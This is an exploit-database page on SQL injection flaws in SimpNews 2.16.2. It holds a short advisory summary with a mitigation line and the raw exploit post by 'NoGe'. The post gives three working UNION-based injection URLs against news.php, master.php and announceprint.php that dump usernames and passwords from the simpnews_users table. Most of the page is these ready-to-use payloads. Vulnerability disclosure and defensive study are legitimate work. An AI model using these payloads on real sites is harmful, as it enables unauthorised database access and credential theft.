SimpNews Multiple SQL Injection Vulnerabilities

vendor:

SimpNews

by:

NoGe

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: SimpNews

Affected Version From: 2.16.2

Affected Version To: 2.16.2

Patch Exists: NO

Related CWE: N/A

CPE: a:boesch-it:simpnews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SimpNews Multiple SQL Injection Vulnerabilities

SimpNews version 2.16.2 and below is vulnerable to multiple SQL Injection vulnerabilities. The vulnerable files are news.php, master.php and announceprint.php. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable files. For example, an attacker can send a malicious query to news.php?category=[sql], master.php?newsnr=[sql] and announceprint.php?announcenr=[sql] to exploit the vulnerability.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

==============================================================================================================


  [o] SimpNews Multiple SQL Injection Vulnerabilities

       Software : SimpNews version 2.16.2 and below
       Vendor   : http://www.boesch-it.de/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


==============================================================================================================


  [o] Vulnerable file

       news.php
       master.php
       announceprint.php


  [o] Exploit

       http://localhost/[path]/news.php?category=[sql]
       http://localhost/[path]/master.php?newsnr=[sql]
       http://localhost/[path]/announceprint.php?announcenr=[sql]


  [o] PoC

       http://localhost/news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--
       http://localhost/master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM+simpnews_users+WHERE+usernr=1--
       http://localhost/announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--


==============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory :*
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

==============================================================================================================